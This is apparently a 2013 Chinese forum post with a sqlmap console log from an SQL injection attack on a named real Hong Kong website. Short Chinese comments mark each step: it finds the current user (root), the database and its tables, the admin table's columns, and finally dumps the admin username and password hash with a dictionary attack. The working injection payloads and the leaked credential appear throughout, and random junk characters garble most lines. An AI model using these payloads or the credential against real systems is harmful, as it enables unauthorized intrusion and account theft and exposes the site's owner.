D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db" _, G% p1 R3 d" n
ms "Mysql" --current-user /* 注解:获取当前用户名称
) h+ ]! \: t1 L5 R3 X sqlmap/0.9 - automatic SQL injection and database takeover tool
* F* s& C' |0 \# c http://sqlmap.sourceforge.net starting at: 16:53:547 d# u4 }8 e. J9 l) y7 O
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as2 I, d4 f4 o( B6 X3 v
session file b& a5 w7 V1 c- x! x$ h1 J
[16:53:54] [INFO] resuming injection data from session file
6 I" _7 K0 i1 D% s# n[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
! D# v# G* n% V- J, w9 ^3 L[16:53:54] [INFO] testing connection to the target url
u4 H; M4 G# m( ^% f% |; {sqlmap identified the following injection points with a total of 0 HTTP(s) reque
; M! b* O2 W$ K o1 Ists:
7 L% i7 @9 @: C& a- i' a---0 R1 T+ s7 D) e* ~. w* p0 D
Place: GET: O% S$ z7 @& q$ [( z
Parameter: id
3 m& ?3 J7 B/ `/ M2 R Type: boolean-based blind
1 [' u, e. {6 P" m% e Title: AND boolean-based blind - WHERE or HAVING clause) f" z# R* D8 j; r- t0 P9 g: \) F2 c! O
Payload: id=276 AND 799=799
* C/ v) R/ J* }( F Type: error-based! N- H+ Q/ ?, r% s) v+ p, z$ p
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause3 X" a$ w& K0 a* ^ W4 | }
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,3 L* G5 R2 j) \+ |3 A& Z
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ g; {9 F6 o Y9 |. M, {
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), |) ]3 U1 E0 h9 r
Type: UNION query- A4 O# g& p2 u4 l+ f& K
Title: MySQL UNION query (NULL) - 1 to 10 columns
' G% r" O8 \+ U) |* m Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
$ O- m3 c* h* X7 j, D2 J(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
! c! ~* _% u1 e+ Q+ hCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#8 o* o# z2 `3 F0 |6 U) K0 P7 L
Type: AND/OR time-based blind; q' m* I: g7 ^/ | c1 E0 g; l/ u
Title: MySQL > 5.0.11 AND time-based blind
' ]# i, J1 d, S0 q Payload: id=276 AND SLEEP(5)
! ~) H; e. o' G/ o4 o1 o---
$ V' y' W0 e/ J% y# h[16:53:55] [INFO] the back-end DBMS is MySQL) |+ X" y) a4 l9 ?4 t
web server operating system: Windows- G7 w, Q& a! h: P& l5 `8 m3 P( c
web application technology: Apache 2.2.11, PHP 5.3.0; G) _/ d$ f R! A
back-end DBMS: MySQL 5.01 I) p% J8 y+ n& N2 ?0 x% S
[16:53:55] [INFO] fetching current user
z' E. O3 I8 Z' O8 v3 Jcurrent user: 'root@localhost' ( Y' p6 }7 P1 o I
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
: _, M0 [3 v- ttput\www.wepost.com.hk' shutting down at: 16:53:58
( _/ y5 a8 R, [0 y3 v
9 r. z) D, Y; E2 l# LD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
; \+ N" X8 h- Q& xms "Mysql" --current-db /*当前数据库" ~2 Q0 B2 [8 g% w
sqlmap/0.9 - automatic SQL injection and database takeover tool6 Z- Q) b; N9 F# @% P: O' I
http://sqlmap.sourceforge.net starting at: 16:54:16- I! U7 r3 x5 g( h* a2 M
[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as% I& \# c' f+ ^/ v# P+ R
session file
3 T( o! m6 u# B! k# n) m7 q[16:54:16] [INFO] resuming injection data from session file0 O2 |* K5 m! W
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
" h0 ^ V. j. |6 y* h& t2 W[16:54:16] [INFO] testing connection to the target url* Q( O4 h& V7 b6 q2 h
sqlmap identified the following injection points with a total of 0 HTTP(s) reque+ C- ?, Y) Z! Q% t( {) f+ w3 P5 Q$ q
sts:) d% ]0 T& j5 t7 e, r) j6 s
---% b2 p- X) I/ U( l8 v5 l
Place: GET
+ q7 e8 o8 S* P& [Parameter: id7 i Z* e% N$ A& _% e/ k' c8 i& p
Type: boolean-based blind! Z5 N$ Q- A% N: w" `+ ^
Title: AND boolean-based blind - WHERE or HAVING clause+ N! `4 W1 r( T2 j5 q
Payload: id=276 AND 799=799
7 w9 ^% [/ t5 t% G; Q Type: error-based
1 O7 }4 O2 i' H/ ^2 X; u Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
: L8 u6 O- Z# w# j" C2 |, c% S Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% B5 ?/ M# F9 w
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
w& S: H' [8 I% Z: A),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
, C- b* W1 R1 d& R; W. R1 H& \# ` Type: UNION query
, L v' u% R7 z# K7 M Title: MySQL UNION query (NULL) - 1 to 10 columns8 w- |( n9 l) P5 }) i+ n! p: w5 p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 e+ S: A8 u8 X+ M5 B- ]1 F
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
( q2 l. \# M) f0 c' ] ^CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
) l, G! F x1 |: u9 Z7 y Type: AND/OR time-based blind
2 j6 ~! n& S) T! k4 I @ Title: MySQL > 5.0.11 AND time-based blind8 E" ]' A2 |, ^# s4 a1 Z# q5 {
Payload: id=276 AND SLEEP(5)# x2 K1 N; q: u* h6 h; M' U
---
' Y* ?' R) L3 A2 J0 ~- @: R[16:54:17] [INFO] the back-end DBMS is MySQL
& j3 L' t: @) W( m% |5 S6 t2 Vweb server operating system: Windows
! t' j0 ~! ]- y/ N1 O/ Q2 S# rweb application technology: Apache 2.2.11, PHP 5.3.0
2 E/ {% M( q+ ^ _back-end DBMS: MySQL 5.0
5 N6 |- h' i9 `) s[16:54:17] [INFO] fetching current database. |! |) C g) W+ G
current database: 'wepost'" z6 _& N4 }) n- S+ D ]( ?
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou/ w% Q# S$ A( J8 ^! }% Y& @( s
tput\www.wepost.com.hk' shutting down at: 16:54:18( F4 r4 o# u( B$ n5 [5 _' |
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: q4 K# o4 { A$ f/ n( f+ nms "Mysql" --tables -D "wepost" /*获取当前数据库的表名
$ }3 |& C/ R5 |0 {! o# x sqlmap/0.9 - automatic SQL injection and database takeover tool4 n1 n; M1 O% u6 u! a
http://sqlmap.sourceforge.net starting at: 16:55:255 U T* l6 Y( A; H: P8 s o
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as: X$ T" A& V3 F9 o2 V
session file9 L" E9 I% m! W [8 m% |1 V5 X
[16:55:25] [INFO] resuming injection data from session file
5 g/ ?1 T% ^" r% \2 q- B$ o[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file- R% J" Q: X' O6 g6 k
[16:55:25] [INFO] testing connection to the target url
( t9 G; M) `% e5 Q1 c1 p- hsqlmap identified the following injection points with a total of 0 HTTP(s) reque
! e4 d/ S+ I4 Y9 X+ m. E# Qsts:
: h5 I/ F: d4 ?, U7 A8 w6 ^---* F" K8 U- I6 h9 a" B
Place: GET
: ]; e! g0 f: {- [5 wParameter: id: C. ]( w) h* b
Type: boolean-based blind
- a( p) U/ ]+ z8 Z Title: AND boolean-based blind - WHERE or HAVING clause8 ?3 ^% B) U& I
Payload: id=276 AND 799=7998 J# U4 l. R+ t3 q i" b2 k
Type: error-based
4 k# S! Q4 t( Q( J" H% b2 i" A Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause& J: h9 w' J6 h( U
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 M0 }; F# `: k/ y; q& ?
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
9 d! _* F6 O# ]& L3 r),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" k2 R: P: i9 D0 `
Type: UNION query
) ^- Q' Z! n& t8 C$ j/ x7 k Title: MySQL UNION query (NULL) - 1 to 10 columns
: f0 n, V f+ e. I& o- b Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR5 U2 r3 ^% v- Y6 {- f$ U) b* L; l
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),' y/ `1 p) J8 l9 b K8 r- @; M
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL# {' B( r* g/ q y5 _( x1 i
Type: AND/OR time-based blind/ B3 x* l% |4 b* d2 |5 x6 ^
Title: MySQL > 5.0.11 AND time-based blind9 F" l' T. e, C7 |! V8 E
Payload: id=276 AND SLEEP(5)
- i0 J2 r# t6 F0 G5 p( Z: o! L( t---
$ @% J w7 p6 \[16:55:26] [INFO] the back-end DBMS is MySQL
. E% O, T+ D4 I$ C& xweb server operating system: Windows, n2 j, u4 R& Q; e f: p% H
web application technology: Apache 2.2.11, PHP 5.3.0, \1 ]5 p+ s4 V: c# |
back-end DBMS: MySQL 5.0
) \2 Z" X: E- w) |: U[16:55:26] [INFO] fetching tables for database 'wepost'3 V9 f* }, Q; A3 d
[16:55:27] [INFO] the SQL query used returns 6 entries* s- |, n. r X+ x0 F; c0 F& x
Database: wepost5 q0 k5 \2 n5 Y& i# X7 [; W
[6 tables]" h6 {* f: _' H, r2 p' q
+-------------+/ Y- I; m" b |) C0 S+ e9 p6 ~1 c
| admin |
7 }+ u+ ?( A f. {, x' W| article |/ J. w N; B1 q4 v6 O
| contributor |
) `0 q, {7 y- n: k| idea |
* S E6 v+ n, W6 S8 W$ ?& `* w1 {| image |/ u! }9 c8 z+ p2 t' @2 d
| issue |1 C7 ?2 S T/ q x7 u: p
+-------------+9 L, s. @9 }) j8 A2 j: F
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
; i7 P% R: Z( n9 ntput\www.wepost.com.hk' shutting down at: 16:55:33+ M' l4 Y0 K" K" n/ ^5 g+ K
# ^' a1 B* q4 E! }, Y+ m: e
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
0 J' T: g7 y1 e, kms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名 U7 q; k: E6 V0 ?: K! |( l8 l
sqlmap/0.9 - automatic SQL injection and database takeover tool
" c9 w" p* E ~. G0 Z& E0 E http://sqlmap.sourceforge.net starting at: 16:56:06
+ f- d0 u7 j* tsqlmap identified the following injection points with a total of 0 HTTP(s) reque( }3 Q R" I7 T7 u& c
sts:$ X# { S! V7 c4 I; S* {3 \
---+ C2 f; R$ ]& f0 I% D" V- c
Place: GET
+ K: h% }, ]0 h8 k" m( sParameter: id
/ [& Q. Q, K- w Type: boolean-based blind
) b" a* Q' d2 {& Z% h% T' g Title: AND boolean-based blind - WHERE or HAVING clause
& `! s3 S4 k& `7 C* t+ n+ d Payload: id=276 AND 799=799+ S' k7 ^% c6 H; J( ~
Type: error-based- F0 P& [ S2 J$ }& n& N% e4 T
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause( M+ B5 w# Y3 F8 _1 J% j) M1 m
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,4 n$ Q; B, A8 X+ K0 C" D2 M9 q
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
/ z. z5 q1 O" }' [; m7 a1 V" q),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a), A: i/ r0 w& G( H) X9 j
Type: UNION query
' |3 \! v, ~: u0 O+ I Title: MySQL UNION query (NULL) - 1 to 10 columns
; [! f, B6 E8 X' g' h Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR1 d5 @9 w, C- B9 X0 m
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),: G) B' f+ P, M, B9 X$ q; I
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
+ K @2 q# O. ~' q5 x Type: AND/OR time-based blind
. N% R6 _0 _, {. D# t% x+ m Title: MySQL > 5.0.11 AND time-based blind
, {2 J. ?) B& K T- [) g Payload: id=276 AND SLEEP(5); a. u1 y( ]' ?! u6 h) F
---" O3 T S" { |, d" H/ v
web server operating system: Windows
- k. O5 K* [; Q6 F. b5 Kweb application technology: Apache 2.2.11, PHP 5.3.0
+ y) ?/ o+ k9 q, Q0 e% @3 V: I% oback-end DBMS: MySQL 5.0
5 _) `4 N7 U" u7 t* w[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
7 a: T1 u5 ]) p3 ~' @ssion': wepost, wepost$ l& O1 z3 p0 m' m
Database: wepost
+ V( z( z6 K" YTable: admin& I# @2 ?3 }- l: z
[4 columns]
, w/ s2 V$ V& o4 R' U2 d+ Q4 K+----------+-------------+3 x ?6 T1 v, h6 U) V' C& d3 i0 a
| Column | Type |7 v( o9 `# l; s" m% k5 P' ^; o9 Y" A
+----------+-------------+
6 q0 c: g/ t, v$ k% h4 l| id | int(11) |
* M/ H) [, b ~| password | varchar(32) |
; Z+ o" p( v E| type | varchar(10) |
* `! o% K0 W5 ], a| userid | varchar(20) |
) A" R# ~- @3 P L: X. N1 m& Q+ s8 U4 D+----------+-------------+
+ l# R R- U. y1 P: F! R3 {$ I shutting down at: 16:56:19
) n, R- t) x- [6 P0 m) X
- z7 t6 y% F6 |+ jD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db* P- _% G$ j' E. k; s) c( m# i
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
8 \- S, t, I* j7 Q$ l9 A# g sqlmap/0.9 - automatic SQL injection and database takeover tool
: A# N" l" w4 z# `* Y6 a( P* | http://sqlmap.sourceforge.net starting at: 16:57:14
b& T& O: g' N6 q" Msqlmap identified the following injection points with a total of 0 HTTP(s) reque6 T/ o- ]& [( }4 A' X
sts:
$ e. b/ \3 i* V4 |/ P7 x+ j' i' v---0 V7 T+ @* Z+ V8 B9 K
Place: GET
" z& z( ?7 B$ P$ j; N* y/ P6 `9 oParameter: id% P& s$ q$ c3 Y6 Z2 X
Type: boolean-based blind
8 n5 R3 x6 H% o Title: AND boolean-based blind - WHERE or HAVING clause
/ H$ j3 G2 D J0 Q8 u Payload: id=276 AND 799=799
, ] g6 p( }: Y+ x Type: error-based1 a5 l& q) d9 `) A6 A
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause' t3 l% N' i7 U- L* t
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,8 ^4 @& ~' T3 A. h1 n
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
2 }! W7 |4 Y9 Q0 `),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)) y0 l! r& B( N" ?+ z9 ~% h
Type: UNION query& i: l5 t* H* ?6 O: U
Title: MySQL UNION query (NULL) - 1 to 10 columns' o' A9 f1 D' Q4 [
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
/ N o/ h, w/ d% m0 L9 d(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),$ t w5 @2 D( J/ e
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
! f7 B6 W1 y9 c" H r& K Type: AND/OR time-based blind# n, m3 c1 H9 \# J2 a2 W
Title: MySQL > 5.0.11 AND time-based blind0 k0 g7 W" X- [; A( q: ~
Payload: id=276 AND SLEEP(5) d" u/ s* C8 E1 V# n+ @) w
---8 Y1 F; k/ v, T4 \( @ R# `) s+ Q
web server operating system: Windows
9 i7 w, W, E, L* H$ k7 Dweb application technology: Apache 2.2.11, PHP 5.3.0! c6 F0 E) p& X# c+ D+ u
back-end DBMS: MySQL 5.0
" g) W1 b) n6 J8 ~8 J/ s# L/ arecognized possible password hash values. do you want to use dictionary attack o5 p6 V% h* A" \) b* _4 i1 D( k+ L
n retrieved table items? [Y/n/q] y* `' [9 l( C0 O# r) u* b* {
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]" S8 {7 {# O: V4 s$ E( v/ |4 N3 n% T
do you want to use common password suffixes? (slow!) [y/N] y
7 I6 a8 L1 a: M$ ZDatabase: wepost5 U2 h% p2 B- i; Z
Table: admin
& ^, H/ x0 F; U6 c# z- C[1 entry]0 _0 h( X/ ]% F: o1 F
+----------------------------------+------------+
; X6 v+ |3 ~+ ^1 h$ R| password | userid |
2 Y; s. q' _- A! u1 X$ I% R+----------------------------------+------------+" j' X0 _1 i: `; \9 ^- z1 l$ H O
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |- Z5 |3 W5 `2 `
+----------------------------------+------------+9 d& @( q' o# U2 w6 Z
shutting down at: 16:58:149 @% H6 { ~' K
4 ~, t5 w8 u3 _. x1 [% Y% M
D:\Python27\sqlmap> |
发表于 2013-4-4 22:18:49
收藏
支持
反对